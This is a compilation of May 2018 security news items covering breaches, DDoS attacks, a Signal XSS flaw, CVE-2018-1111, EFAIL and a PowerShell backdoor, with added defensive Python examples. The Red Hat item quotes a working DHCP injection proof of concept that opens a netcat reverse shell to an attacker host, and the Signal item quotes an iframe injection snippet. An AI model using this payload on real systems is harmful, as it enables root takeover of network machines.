Initially, the operation aimed at Assange’s protection, but it later became a spying operation on the journalist. From June 2012 to the end of August 2013, Operation Hotel cost Ecuador $972,889, according to documents belonging to Senain, the Ecuadorian intelligence agency.

The experts hired by Ecuador monitored Assange’s daily activities and any contact with external staff and visitors; they stayed in a rented flat near the embassy at a cost of £2,800 a month.

Julian Assange

“Documents show the intelligence programme, called “Operation Guest”, which later became known as “Operation Hotel” – coupled with parallel covert actions – ran up an average cost of at least $66,000 a month for security, intelligence gathering and counter-intelligence to “protect” one of the world’s most high-profile fugitives.” continues the newspaper.

According to The Guardian, which cited documents it had viewed, Assange hacked the communications system within the embassy, gaining access to staff communications.

“In an extraordinary breach of diplomatic protocol, Assange managed to compromise the communications system within the embassy and had his own satellite internet access, according to documents and a source who wished to remain anonymous.” continues the paper.

“By penetrating the embassy’s firewall, Assange was able to access and intercept the official and personal communications of staff,”

Wikileaks denied Assange had hacked the embassy network.

WikiLeaks

@wikileaks
No, @Guardian, @JulianAssange did not "hack into" embassy
satellites. That's an anonymous libel aligned with the current UK-US government onslaught against Mr. Assange's asylum--while he can't respond. You've gone too far this time. We're suing. https://www.newsweek.com/assange-how-guardian-milked-edward-snowdens-story-323480 …

8:19 PM - May 15, 2018
In response, Ecuador has cut off internet access for Assange in recent months by installing a jammer; the government has also restricted the number of visitors he can receive.

“Assange claims the accusations were politically motivated and could lead to him being extradited to the United States to face imprisonment over WikiLeaks’ publication of secret US military documents and diplomatic cables in 2010.” reported the AFP agency.

“Ecuador in December made Assange an Ecuadoran citizen and unsuccessfully tried to register him as a diplomat with immunity as part of its efforts to have him leave the embassy without risk of being detained.”

Last year, Sweden dropped its investigation on Assange, but the British authorities still plan to arrest him for breaching his bail conditions.


Massive DDoS attack hit the Danish state rail operator DSB
16.5.2018 securityaffairs Attack

The Danish state rail operator DSB was hit by a massive DDoS cyber attack that paralyzed some operations, including ticketing systems and the communication infrastructure.
The Danish state rail operator DSB was hit by an unprecedented DDoS cyber attack; the attack was confirmed on Monday by the company and reported by The Local media outlet.

The attack was launched on Sunday and paralyzed the ticketing system and prevented passengers across the country from buying tickets.

“Tickets purchases via the company’s app, ticket machines, website and in 7-Eleven stores were all out of action due to the issue on Sunday.” reported The Local.

“Passengers with Rejsekort travel cards were able to use that system, while others purchased tickets from ticket inspectors on board trains.”

The state rail operator DSB restored normal operations on Monday morning.

The company’s experts confirmed the attack came from an external source with the specific intent of disrupting operations at the state rail operator. The hackers also took the internal mail system and the telephone infrastructure offline, leaving social media as the only way to communicate with customers.

DSB

@omDSB
There are currently technical problems with http://dsb.dk, sales channels, traffic info and our telephone lines. We are working to resolve the fault.

7:04 PM - May 13, 2018

DSB

@omDSB
We have been made aware that others are still experiencing errors when trying to access http://dsb.dk.

It has been reported and we are working on the matter. https://twitter.com/omDSB/status/995879867022565378 …

7:28 AM - May 14, 2018
The deputy director assured that train safety was not compromised by the hackers.

“Our technicians and IT contractors have analysed this closely during the night and have concluded this is an outside attack in which someone has attempted to bring our system down,” DSB vice-director Aske Wieth-Knudsen said.

Danish state rail operator DSB

“We have previously been subjected to an attack and, of course, we have made some processes to avoid this. The type of attack we saw yesterday is a new way of doing it, as we have not seen before. So it needs to be analyzed a bit closer, exactly what has happened so we can prevent it from repeating,” Wieth-Knudsen told DR.

The company is investigating the issue along with Danish authorities and is monitoring the situation to prevent further attacks.

“At this moment in time I have not yet been in contact with anyone. We are still clarifying some messages, since the attack was only resolved during the night,” he told Ritzau.

“Now the day has started we will naturally contact relevant bodies,” he added.

Aske Wieth-Knudsen from DSB confirmed that the company has not paid any kind of ransom in connection with the cyber assault.


Hackers shared technical details of a Code Injection flaw in Signal App
16.5.2018 securityaffairs Vulnerability

Researchers shared details of a code injection vulnerability they found in the Signal app for both Windows and Linux systems. The flaw was promptly fixed by Signal.
Signal has fixed a code injection vulnerability in the app for both Windows and Linux systems that was reported by a team of Argentinian experts.

A remote attacker could have exploited the flaw to inject malicious code into the Signal desktop app running on the recipient’s system without any user interaction, simply by sending the victim a specially crafted link.

The discovery of the flaw was accidental: the white-hat hackers Iván Ariel Barrera Oro, Alfredo Ortega and Juliano Rizzo were chatting on Signal messenger when one of them shared a link to an XSS-vulnerable Argentinian government website.

The experts noticed that the XSS payload was executed on the recipients’ Signal desktop app.

“we were chatting as usual and suddenly Alfredo shows us an XSS in an Argentinian government site (don’t worry, it’s been reported). He was using the Signal add-on for Chrome. Javier and I were using the desktop version, based on the insecure electron framework. As I was reading, something caught my attention: an icon was showing next to the URL, as a “picture not found” icon.” reads a blog post published by the experts.

Signal XSS flaw

“I jumped from my chair and warned: “your XSS is triggered in signal-desktop!!”.”

Signal xss flaw 2
The researchers focused their attention on XSS flaws in the Signal messaging app and conducted further tests, discovering that the vulnerability affected the function responsible for handling shared links.

The experts discovered that it is possible to exploit the flaw to inject user-defined HTML/JavaScript code via iFrame, image, video and audio tags.

“We tried different kinds of HTML elements: img, form, script, object, frame, frameset, iframe, sound, video (these last two were funny).” continue the experts. “They all worked, except that CSP blocked the execution of scripts, which halted in some way this attack. However, to abuse this vuln, we could:

crash the app with repeated and specially crafted URLs, obtaining segmentation fault/DoS (Alfredo’s app crashed several times but mine didn’t, so we couldn’t reproduce it)
send a crafted image in base64 format (we didn’t carry on with this)
send a file/phish and execute it with <iframe src="…"></iframe>
have fun with <img>, <audio> and <video> 🙂”
Attackers could also exploit the vulnerability to inject a form into the recipient’s chat window, tricking them into providing sensitive information via social engineering.
The experts applauded the Signal security team, which fixed the issue on Friday less than two hours after the report.

Experts explained that the flaw did not allow attackers to execute system commands or gain sensitive information like decryption keys on the recipients’ system.

After Signal fixed the issue, the researchers analyzed the file’s history and discovered that the patch relies on a regex function to validate URLs.
The applied “patch” already existed in the application but was probably accidentally removed in a commit on April 10th that fixed an issue with linking.
The experts are concerned about that regex and are afraid someone might exploit it.
The Signal app continues to be the most secure choice for encrypted communication.
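The rendering mistake behind this class of bug, and the fix, as an added example that is not Signal’s code (Signal Desktop is JavaScript; this is Python, and `render_unsafe`, `render_safe`, `safe_href`, `URL_RE` and the sample message are constructed for illustration): the vulnerable version drops message text straight into markup, while the hardened version escapes the whole message first and then links only URLs that pass a parser-based scheme and host check, rather than trusting a single regex.

```python
import html
import re
from typing import List, Optional
from urllib.parse import urlsplit

# Anything that looks like scheme://... is a link candidate; validation happens separately,
# so the detector can stay simple. (Constructed for this example, not Signal's pattern.)
URL_RE = re.compile(r"[A-Za-z][A-Za-z0-9+.-]*://[^\s<>\"']+")
ALLOWED_SCHEMES = {"http", "https"}


def render_unsafe(message: str) -> str:
    """The vulnerable shape: message text is concatenated straight into markup.
    A message carrying <img>, <iframe>, <video> ... becomes live HTML in the chat window,
    and a CSP that only blocks inline scripts does nothing against those elements."""
    return f'<div class="msg">{message}</div>'


def safe_href(candidate: str) -> Optional[str]:
    """Return an attribute-safe href for an allowlisted http(s) URL with a host, else None.
    A URL parser plus a scheme allowlist is easier to reason about than one large regex."""
    try:
        parts = urlsplit(candidate)
    except ValueError:
        return None
    if parts.scheme.lower() not in ALLOWED_SCHEMES or not parts.hostname:
        return None
    return html.escape(candidate, quote=True)


def render_safe(message: str) -> str:
    """Escape every character of the message first, then wrap only validated URLs in <a>.
    Because escaping happens before linkification, nothing the sender typed can open a tag."""
    pieces: List[str] = []
    pos = 0
    for match in URL_RE.finditer(message):
        pieces.append(html.escape(message[pos:match.start()]))
        raw_url = match.group(0)
        href = safe_href(raw_url)
        text = html.escape(raw_url)
        pieces.append(f'<a href="{href}">{text}</a>' if href else text)
        pos = match.end()
    pieces.append(html.escape(message[pos:]))
    return f'<div class="msg">{"".join(pieces)}</div>'


# Constructed message: a real link, then a tag of the kind the researchers used, then a
# non-http link that must be shown as plain text.
SAMPLE = 'see https://example.org/p?id=1"><img src="x"> and file:///etc/hosts'

if __name__ == "__main__":
    print(render_unsafe(SAMPLE))  # the <img> survives into the markup
    print(render_safe(SAMPLE))    # the <img> is escaped, only the https link is clickable
```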


Dutch Government plans to phase out the use of Kaspersky solutions
16.5.2018 securityaffairs BigBrothers

Dutch Government plans to phase out the use of Kaspersky solutions while the security firm confirmed that its code infrastructure is going to move to Switzerland.
The antivirus firm Kaspersky Lab made the headlines again: the company confirmed that its code infrastructure is going to move to Switzerland. The news arrives just after the Netherlands government commented on the risks associated with the use of Kaspersky Lab software.

The Dutch government announced on Monday that it plans to phase out the use of anti-virus software developed by Kaspersky Labs “as a precautionary measure” and recommended that companies involved in the protection of critical infrastructure do the same.

The Dutch government fears an aggressive Russian cyber strategy that targets, among others, the country’s interests.

“In a letter to parliament, Justice Minister Ferdinand Grapperhaus said the decision was made because the Russian government had an “offensive cyber programme that targets among others the Netherlands and Dutch interests”.” reported The New York Times.

“He also said Moscow-based Kaspersky was subject to Russian laws that could oblige it to comply with Russian state interests.”

In response to the accusations from several governments, Kaspersky is moving a number of its core activities from Russia to Switzerland as part of its “Global Transparency Initiative.” It has been estimated that the overall costs of the transfer are $12m.

“The (Dutch) cabinet has carried out an independent review and analysis and made a careful decision on that basis,” Grapperhaus said. “Although there are no concrete cases of misuse known in the Netherlands, it cannot be excluded.”

Grapperhaus explained the Dutch government would consider revising the decision “if circumstances justify” doing so.


The U.S. DHS banned the use of Kaspersky software by the U.S. Federal government in 2017, while Kaspersky continues to deny any cooperation with Russian intelligence.

Britain’s National Cyber Security Centre also advises agencies and organizations to avoid using Kaspersky solutions to protect systems that manage classified information.

In December, Lithuania announced it will ban the products of the cybersecurity giant Kaspersky from computers in critical infrastructure.

In April, Twitter banned Kaspersky from advertising on its platform citing DHS ban for its alleged ties with Russian intelligence agencies.


Rail Europe North America hit by payment card data breach
16.5.2018 securityaffairs Incident

Rail Europe North America (RENA) has notified customers of a security breach: crooks compromised its website with malware used to siphon payment card data.
The website allows users to buy European train tickets. According to the company, the data breach lasted at least three months (between November 29, 2017 and February 16, 2018) and also exposed customers’ payment card data.

“Rail Europe North America Inc. (“RENA” or “we”) is writing to let you, as a customer of RENA, know about a recent data security incident that may have involved your credit card or debit card information and other personal information” reads the notice sent by the company to its customers.

“On February 16, 2018, as a result of a query from one of our banks, we discovered that beginning on November 29, 2017, through February 16, 2018, unauthorized persons gained unauthorized access to our ecommerce websites’ IT platform. Upon discovery that this malicious intrusion may have compromised users’ personal information, we immediately cut off from the Internet all compromised servers on February 16, 2018, and engaged information security experts to assist with forensic analysis, system restoration and security hardening”

According to the notice of data breach, hackers accessed registered users’ personal information including name, gender, delivery address, invoicing address, telephone number, email address, credit/debit card number, expiration date and CVV of customers, and, in some cases, username and password.

Rail Europe North America hack

The security breach was discovered after a bank inquiry informed the organization of an attack.

“In this case, however, the hackers were able to affect the front end of the Rail Europe website with ‘skimming’ malware, meaning customers gave payment and other information directly to the hackers through the website,” said Comparitech privacy advocate Paul Bischoff. “While the details haven’t been fully disclosed, the fact that this went on for three months shows a clear lack of security by Rail Europe.”

RENA replaced and rebuilt all compromised systems from known safe code, it also removed any potentially untrusted components. The IT staff changed passwords on all systems and applications, improved security controls and renewed digital certificates.

“RENA has also provided notice to the credit card brands and our credit/debit card transaction processors.” continues the notice.
“In addition, we are offering identity theft protection services through ID Experts®, the data breach and recovery services expert, to provide you with MyIDCare™. MyIDCare services include: 12 months of Credit and CyberScan monitoring, a $1,000,000 insurance reimbursement policy, exclusive educational materials and fully managed id theft recovery services.”


Anonymous defaced Russia govt website against Telegram ban
16.5.2018 securityaffairs BigBrothers

Anonymous collective hacked and defaced the subdomain of the Russia’s Federal Agency for International Cooperation (Rossotrudnichestvo) site to protest against the government censorship, with a specific reference to the ban on Telegram.
Anonymous hacked the official website of Russia’s Federal Agency for International Cooperation (Rossotrudnichestvo); the cyber attack occurred on May 10th. The popular collective hacked and defaced a subdomain of the site to protest against government censorship, with a specific reference to the ban on Telegram. Last month, the Russian authorities blocked the Telegram app in the country because the company refused to hand over its users’ encryption keys to the Federal Security Service (FSB) of Russia for investigation purposes.

“The website of a government agency tasked with promoting Russia’s image abroad has been hijacked by hackers who posted a message with a threat against the state body involved in a campaign to block a popular messaging app.” reads The Moscow Times.

Since May 3rd, 2018, Russia’s media and communications regulatory authority Roskomnadzor has blocked over 50 virtual private networks (VPNs), web proxies and anonymizing networks.

Anonymous defaced one of the subdomains of Rossotrudnichestvo; the hackers published an NSFW image and several messages against the ongoing government censorship.

“Greetings, Roskomnadzor. Your recent destructive actions against Runet led us to the idea that you are just a handful of incompetent brainless worms. You no longer have to be able to continue this pointless vandalism. Consider this as our last warning. Yours, Anonymous.” reads the message published on the defaced domain.

Anonymous hack Russia Website
Source: Hackread.com

“That defacement was accompanied by the image of a cartoon character wearing a Roskomnadzor arm patch using a flamethrower on the “internet,” as well as a symbol of Telegram founder Pavel Durov’s “Digital Resistance” which he declared against political censorship.” continues the media outlet.

Currently, the Rossotrudnichestvo website is up and active, while the defaced subdomain prev.rs.gov.ru is offline.


Red Hat Linux DHCP Client affected by a command injection flaw, patch it now!
16.5.2018 securityaffairs Vulnerability

Red Hat has announced a critical vulnerability in its DHCP client tracked as CVE-2018-1111 that could be exploited by attackers to execute arbitrary commands with root privileges on targeted systems.
Felix Wilhelm from the Google security team discovered a critical remote command injection vulnerability in the DHCP client implementation of Red Hat Linux; the issue also affects other distros based on it, like Fedora.

The vulnerability, tracked as CVE-2018-1111, could be exploited by attackers to execute arbitrary commands with root privileges on targeted systems.

Felix Wilhelm
@_fel1x
CVE 2018-1111 is a pretty bad DHCP remote root command injection affecting Red Hat derivates: https://access.redhat.com/security/vulnerabilities/3442151 …. Exploit fits in a tweet so you should patch as soon as possible.

3:54 PM - May 15, 2018
“Red Hat has been made aware of a command injection flaw found in a script included in the DHCP client (dhclient) packages in Red Hat Enterprise Linux 6 and 7.” reads the security advisory published by Red Hat.

“A malicious DHCP server, or an attacker on the local network able to spoof DHCP responses, could use this flaw to execute arbitrary commands with root privileges on systems using NetworkManager which is configured to obtain network configuration using the DHCP protocol.”

The DHCP client application receives network configuration parameters, including the IP address and DNS servers, from the DHCP (Dynamic Host Configuration Protocol) server.

The CVE-2018-1111 command injection flaw resides in the NetworkManager integration script of the DHCP client packages in Red Hat Enterprise Linux.

The researcher Barkın Kılıç published a PoC for CVE-2018-1111; in the last screenshot the attacker accesses the shell as root.

Red Hat DHCP client flaw

Barkın Kılıç
@Barknkilic
#CVE-2018-1111 tweetable PoC :) dnsmasq --interface=eth0 --bind-interfaces --except-interface=lo --dhcp-range=10.1.1.1,10.1.1.10,1h --conf-file=/dev/null --dhcp-option=6,10.1.1.1 --dhcp-option=3,10.1.1.1 --dhcp-option="252,x'&nc -e /bin/bash 10.1.1.1 1337 #" cc: @cnbrkbolat

9:21 PM - May 15, 2018
Wilhelm did not release a PoC exploit code, but he explained that it is so short it can fit in a tweet.

According to Wilhelm, an attacker running a malicious DHCP server, or connected to the same network as the victim, can exploit this vulnerability by spoofing DHCP responses, eventually allowing them to run arbitrary commands with root privileges on the victim’s system running a vulnerable DHCP client.

The vulnerability affects Red Hat Enterprise Linux 6 and 7; admins should update their packages to the newer versions as soon as they are available.

“Users have the option to remove or disable the vulnerable script, but this will prevent certain configuration parameters provided by the DHCP server from being configured on a local system, such as addresses of the local NTP or NIS servers,” Red Hat warns.
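The shell pattern behind this bug, as an added example that is not Red Hat’s dispatcher script: it builds the `export name=value` lines such a script hands to `eval`, first the fragile way and then with a validated name and `shlex.quote`, and tokenizes both the way a POSIX shell would so the difference can be inspected offline. `HOSTILE_VALUE`, `build_export_unsafe`, `build_export_safe` and `shell_commands` are constructed for illustration.

```python
import re
import shlex
from typing import List

# Constructed stand-in for a DHCP option value a rogue server could hand out (the PoC above
# abuses option 252). The single quote is the whole trick: it terminates the quoting that a
# script wraps around the value, and everything after it is parsed as new shell commands.
# Here the "payload" only sets a marker variable, which is enough to show the effect.
HOSTILE_VALUE = "x'; MARKER=injected; : '"

# Variable names become shell syntax too, so they get an allowlist rather than quoting.
SHELL_NAME_RE = re.compile(r"^[A-Za-z_][A-Za-z0-9_]*$")


def build_export_unsafe(name: str, value: str) -> str:
    """The fragile pattern: hand-wrap the raw value in single quotes and let the shell
    re-parse the result with eval. Works until the value itself contains a quote."""
    return f"export {name}='{value}'"


def build_export_safe(name: str, value: str) -> str:
    """Validate the name, and let shlex.quote produce quoting that survives any byte in
    the value, so the shell sees exactly one assignment word."""
    if not SHELL_NAME_RE.match(name):
        raise ValueError(f"refusing to export suspicious variable name {name!r}")
    return f"export {name}={shlex.quote(value)}"


def shell_commands(line: str) -> List[List[str]]:
    """Tokenize a line the way a POSIX shell would (quote removal, ';' as an operator) and
    split it into simple commands. One command per line is what the script intended;
    anything more is injected."""
    lexer = shlex.shlex(line, posix=True, punctuation_chars=True)
    commands: List[List[str]] = []
    current: List[str] = []
    for token in lexer:
        if token == ";":
            commands.append(current)
            current = []
        else:
            current.append(token)
    if current:
        commands.append(current)
    return commands


if __name__ == "__main__":
    # Unsafe: three commands, the value truncated to "x", MARKER set by the "option value".
    # In the real script this line ran under NetworkManager, i.e. as root.
    print(shell_commands(build_export_unsafe("new_wpad", HOSTILE_VALUE)))
    # Safe: a single export whose value is exactly the bytes the server sent.
    print(shell_commands(build_export_safe("new_wpad", HOSTILE_VALUE)))
```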

Below is the full list of affected RHEL versions:

Advanced Update Support 6.4; Extended Update Support 7.3; Advanced Update Support 6.6; Red Hat Enterprise Linux 6; Extended Update Support 6.7; Advanced Update Support 7.2; Server TUS (v.6.6); RHEL 7; Extended Update Support 7.4; Virtualization 4 Management Agent for RHEL 7 Hosts; Advanced Update Support 6.5; and Linux Server TUS (v. 7.2).

Red Hat’s update services for SAP Solutions on x86 and IBM Power architectures are also affected.

Fedora has already released new versions of DHCP packages containing fixes for Fedora 26, 27, and 28.

Other Linux distros like OpenSUSE and Ubuntu are not affected by the vulnerability because their DHCP client implementations don’t include the NetworkManager integration script by default.


Mysterious hackers ingenuously reveal two Zero-Days to security community
16.5.2018 securityaffairs Vulnerability

Mysterious hackers ingenuously revealed two zero-days to the security community; experts collaborated to promptly fix them.
Anton Cherepanov, a security researcher at ESET, discovered two zero-days while analyzing a malicious PDF; according to the researcher, the mysterious hacker(s) were still working on the exploits.

The malicious PDF was discovered late in March 2018 (two suspicious PDF samples: zero-day 1, zero-day 2); the analysis of the document revealed it was exploiting two previously unknown vulnerabilities, a remote code execution vulnerability in Adobe Reader and a Windows privilege escalation flaw.

“The use of the combined vulnerabilities is extremely powerful, as it allows an attacker to execute arbitrary code with the highest possible privileges on the vulnerable target, and with only the most minimal of user interaction. APT groups regularly use such combinations to perform their attacks, such as in the Sednit campaign from last year.” reads the analysis published by ESET.

“The sample does not contain a final payload, which may suggest that it was caught during its early development stages,” Cherepanov said.

ESET shared its discovery with the Microsoft Security Response Center, the Windows Defender ATP research team, and the Adobe Product Security Incident Response Team, which fixed these bugs.

The two zero-days were tracked as CVE-2018-4990, which affected the Adobe Acrobat/Reader PDF viewer, and CVE-2018-8120, which affected the Win32k component of Windows.

By chaining the two vulnerabilities it was possible to escape Adobe’s sandbox protection and execute arbitrary code inside Adobe Acrobat/Reader.

“The malicious PDF sample embeds JavaScript code that controls the whole exploitation process. Once the PDF file is opened, the JavaScript code is executed,” states the report published by ESET.

Below are the steps composing the attack chain:

The victim receives and opens a weaponized PDF file.
Once the user opens the PDF, malicious JavaScript code executes.
The JavaScript code manipulates a button object.
The button object contains a specially crafted JPEG2000 image, which triggers a double-free vulnerability in Adobe Acrobat/Reader.
The JavaScript code uses heap-spray techniques to obtain read and write memory access.
The JavaScript code then interacts with Adobe Reader’s JavaScript engine.
The attacker uses the engine’s native assembly instructions (ROP gadgets) to execute their own native shellcode.
The shellcode initializes a PE file embedded in the PDF.
Once the attacker has exploited the Adobe Reader vulnerability, they leverage the Windows zero-day flaw to escape the sandbox. The Microsoft Win32k zero-day allows the attacker to elevate the privileges of the embedded PE file by running code in kernel mode, escaping the Adobe Acrobat/Reader sandbox and gaining system-level access.
Even though the chain of zero-days could be very dangerous, the developers allowed the security community to detect it by uploading the sample to a known virus-scanning engine, apparently to test its evasion capability.

zero-days exploits

The two zero-days have already been patched: Microsoft addressed CVE-2018-8120 with the release of the May 2018 Patch Tuesday, and Adobe patched CVE-2018-4990 this week.
“Initially, ESET researchers discovered the PDF sample when it was uploaded to a public repository of malicious samples. The sample does not contain a final payload, which may suggest that it was caught during its early development stages.” concludes the report.
“Even though the sample does not contain a real malicious final payload, which may suggest that it was caught during its early development stages, the author(s) demonstrated a high level of skills in vulnerability discovery and exploit writing.”


Symantec Shares More Information on Internal Investigation
15.5.2018 securityweek  IT

Symantec shares gained nearly 10 percent on Monday in anticipation of a conference call that promised to provide more information regarding the internal investigation announced by the company last week.

Along with its financial results for the fourth quarter and full year, Symantec told investors last week that the Audit Committee of the Board of Directors had launched an investigation as a result of concerns raised by a former employee.

The company initially did not share any additional information, except that the Securities and Exchange Commission (SEC) had been notified and that the probe would likely prevent it from filing its annual 10-K report with the SEC in a timely manner.

Symantec shares dropped roughly 20 percent to less than $24 after the announcement was made on Thursday, and on Friday shares dove 33 percent, reaching just over $19.

A conference call announced for Monday afternoon helped the company gain nearly 10 percent, closing at $21.40.

While many expected Symantec to provide details on its internal probe, the company did not answer any questions on the matter. A statement published by the company does, however, reveal that the investigation is related to “concerns raised by a former employee regarding the Company’s public disclosures including commentary on historical financial results, its reporting of certain Non-GAAP measures including those that could impact executive compensation programs, certain forward-looking statements, stock trading plans and retaliation.”

The company says it cannot predict the duration of the investigation or the outcome, which could have an impact on financial results and guidance.

The cybersecurity firm says it does not anticipate a material adverse impact on its historical financial statements.

In response to news of the internal probe, investor rights law firm Rosen Law Firm announced the preparation of a class action to recover losses suffered by Symantec investors. Rosen says it’s investigating allegations that Symantec “may have issued materially misleading business information to the investing public.”


Adobe Patches Two Dozen Critical Flaws in Acrobat, Reader
14.5.2018 securityweek Vulnerability

Updates released on Monday by Adobe for its Acrobat, Reader and Photoshop products patch nearly 50 vulnerabilities, including critical flaws that allow arbitrary code execution.

A total of 47 security holes have been addressed in the Windows and macOS versions of Acrobat DC (Consumer and Classic 2015), Acrobat Reader DC (Consumer and Classic 2015), Acrobat 2017, and Acrobat Reader 2017. The flaws have been resolved with the release of versions 2018.011.20040, 2017.011.30080 and 2015.006.30418.

The vulnerabilities include 24 critical memory corruptions that allow arbitrary code execution in the context of the targeted user, and various types of “important” issues that can lead to information disclosure or security bypasses.

Independent experts and researchers from Cisco Talos, ESET, Kaspersky, Check Point, Palo Alto Networks, Tencent, Knownsec 404 Security Team, Cybellum and Cure53 have been credited for responsibly disclosing the flaws patched with the latest Acrobat and Reader releases. Many of the security bugs were reported to Adobe through Trend Micro’s Zero Day Initiative (ZDI).

Adobe also informed customers that support for Acrobat and Reader 11.x ended on October 15, 2017, and that version 11.0.23 is the final release for these branches. Users have been advised to update to the latest versions of Acrobat DC and Acrobat Reader DC.

Adobe has also released security updates for the Windows and macOS versions of Photoshop CC to address a flaw reported by researcher Giwan Go.

Photoshop CC 2018 version 19.1.4 and Photoshop CC 2017 version 18.1.4 fix a critical out-of-bounds write issue that can be exploited for arbitrary code execution in the context of the targeted user.

Earlier this month, Adobe patched several vulnerabilities in its Flash Player, Creative Cloud and Connect products with the company’s Patch Tuesday updates.

The previous round of security updates for Acrobat and Reader resolved 39 vulnerabilities. However, those updates had been assigned a priority rating of “2,” which makes them less likely to be exploited, while the latest patches have been given a priority rating of “1,” which means exploitation is more likely and users should update as soon as possible.


Emails Encrypted With OpenPGP, S/MIME Vulnerable to New Attacks
14.5.2018 securityweek Attack

Researchers from three universities in Germany and Belgium say they have discovered attack methods that can be used by malicious actors to read emails encrypted with OpenPGP and S/MIME, but some believe the claims are overblown.

The team of researchers who discovered the attacks were initially planning on disclosing details on Tuesday morning, but they later decided to make their findings public sooner as a result of speculation and third parties leaking information.

OpenPGP is an encryption standard that is often used by individuals and organizations to protect emails and other types of communications against eavesdropping. S/MIME (Secure/Multipurpose Internet Mail Extensions) is a standard that is more commonly used to secure email in enterprise environments.

According to the researchers, some vulnerabilities in OpenPGP and S/MIME can be exploited to exfiltrate plaintext from encrypted emails, including messages the targeted user sent in the past.

There are two variations of this attack, which experts have dubbed EFAIL. Both require the attacker to be able to intercept encrypted emails, either via man-in-the-middle (MitM) attacks, by hacking email accounts, or through compromised SMTP servers. The attacker then manipulates the ciphertext in the harvested emails and sends a modified message containing custom HTML code to the original receiver or sender.

The first method, which involves direct exfiltration, leverages vulnerabilities in the Apple Mail (for iOS and macOS) and Mozilla Thunderbird email clients. In this attack, the hacker sends the targeted user a specially crafted multipart email with three HTML body parts. When the victim’s client opens and decrypts the email, the attacker’s code causes the application to send the text to the attacker’s server.

The second method, named a CBC/CFB gadget attack, abuses vulnerabilities in the OpenPGP (CVE-2017-17688) and S/MIME (CVE-2017-17689) specifications. In both cases the victim needs to be in possession of their private key – the method cannot be used to recover encrypted messages if the private key has been lost.

“Once [the victim] opens the email in his client, the manipulated ciphertext will be decrypted – first the private key of the victim is used to decrypt the session key s, and then this session key is used to decrypt the manipulated ciphertext c. The decrypted plaintext now contains, due to the manipulations, an exfiltration channel (e.g., an HTML hyperlink) that will send the decrypted plaintext as a whole or in parts to the attacker,” researchers wrote in their paper on EFAIL.

Experts say the direct exfiltration technique is effective against both PGP and S/MIME, while the CBC/CFB gadget method works against PGP with a success rate of one in three attempts; with further research, the gadget attacks could become more effective against PGP as well.

The EFAIL attack is said to work against 25 of 35 tested S/MIME email clients and 10 of 28 tested OpenPGP clients.

Just as the researchers announced their intention to disclose the details of these vulnerabilities, the EFF published a blog post telling users to “immediately disable and/or uninstall tools that automatically decrypt PGP-encrypted email” and use alternatives, such as Signal, for secure communications.

However, some members of the industry believe the EFF’s alert and the researchers’ claims are overblown, noting that EFAIL attacks are actually possible due to how email clients implement PGP and they can be mitigated by not using HTML for incoming emails.

Cryptography expert Matthew Green believes EFAIL poses a bigger risk to enterprises that use S/MIME, describing the attack on this standard as “straightforward.”


Medium-term mitigations proposed by the researchers who discovered EFAIL involve patches released by email client developers, but they believe the mitigations implemented by each vendor “may or may not prevent the attacks.” As for long-term mitigations, they believe changes will need to be made to the OpenPGP and S/MIME standards themselves.


New PowerShell Backdoor Discovered
14.5.2018 securityweek Virus

A recently detected PowerShell backdoor can steal information and execute various commands on the infected machines.

Dubbed PRB-Backdoor, the malware has been distributed via a Word document containing malicious macros. The document was named “Egyptairplus.doc” and was initially believed to deliver malware linked to the MuddyWater campaigns targeting the Middle East.

Analysis of the document’s macro revealed a function called Worker(), designed to call multiple other functions embedded in the document, to ultimately run a PowerShell command.

The command looks within the document for a chunk of embedded data that is Base64 encoded and decodes it, the security researcher behind Security 0wnage explains. This eventually results in an obfuscated PowerShell script.

“Replacing iex with Write-Output and running this code will result in a second layer PowerShell script that is shown earlier in the blog and has similarities with MuddyWater code due to the use of the Character Substitution functions,” the security researcher notes.

Replacing all the iex with Write-Output reveals more readable code that still contains encoded chunks of data. Further analysis of the code revealed an Invoker.ps1 script designed to decrypt the main backdoor code.
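The decode-then-print trick the researcher describes (swap iex for Write-Output so each layer is revealed instead of executed) can be scripted so that no PowerShell runs at all during analysis. The following Python is an added example written for this page; it is not the Security 0wnage researcher's tooling and not the PRB-Backdoor dropper, and the three-layer sample command it peels is constructed here for illustration and does nothing.

```python
"""Static peeling of base64-wrapped PowerShell stages, with iex rewritten to
Write-Output so each stage is revealed rather than executed.  Added example:
the sample command is constructed here and is not the PRB-Backdoor dropper."""
import base64
import re

# Two common ways an encoded stage reaches the decoder:
#   powershell -EncodedCommand <b64>     (payload is UTF-16LE text)
#   [Convert]::FromBase64String('<b64>') (encoding chosen by the script; UTF-8 assumed)
ENC_ARG = re.compile(r"-e(?:nc(?:odedcommand)?)?\s+([A-Za-z0-9+/=]{16,})", re.I)
FROM_B64 = re.compile(r"""FromBase64String\(\s*['"]([A-Za-z0-9+/=]+)['"]\s*\)""", re.I)
# Word-bounded so identifiers such as $iexfoo are left alone.
IEX = re.compile(r"\b(?:iex|invoke-expression)\b", re.I)


def find_b64_layer(command: str):
    """Return the decoded text of the next stage embedded in `command`, or None."""
    m = ENC_ARG.search(command)
    if m:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    m = FROM_B64.search(command)
    if m:
        return base64.b64decode(m.group(1)).decode("utf-8", errors="replace")
    return None


def neutralise_iex(script: str) -> str:
    """Turn 'decode then execute' into 'decode then print' for safe inspection."""
    return IEX.sub("Write-Output", script)


def peel(command: str, max_layers: int = 5) -> list:
    """Follow the chain of encoded stages; layers[0] is the input, later entries
    have had iex replaced, so nothing in the returned text would execute a stage."""
    layers = [command]
    current = command
    for _ in range(max_layers):
        nxt = find_b64_layer(current)
        if nxt is None:
            break
        current = neutralise_iex(nxt)
        layers.append(current)
    return layers


def build_sample() -> str:
    """Constructed three-stage chain in the shape described above (harmless)."""
    stage3 = "function PRB { Write-Host 'constructed stage 3' }"
    stage2 = ("$s = [Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('"
              + base64.b64encode(stage3.encode()).decode() + "'));iex $s")
    encoded = base64.b64encode(stage2.encode("utf-16-le")).decode()
    return "powershell.exe -NoP -W Hidden -EncodedCommand " + encoded


if __name__ == "__main__":
    for depth, text in enumerate(peel(build_sample())):
        print(f"--- layer {depth} ---\n{text}\n")
```

PowerShell's -EncodedCommand takes UTF-16LE text, whereas the argument to [Convert]::FromBase64String is in whatever encoding the script applies afterwards (UTF-8 is assumed here); the function tries both forms and stops at the first layer that carries no further encoded chunk. It is a static aid only: a stage that builds its successor through string arithmetic or a character-substitution function, as the MuddyWater-style code on this page does, still has to be read by hand.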

The backdoor contains over 2,000 lines of code when properly formatted. Because the main function is named PRB, the researcher decided to call the malware PRB-Backdoor.

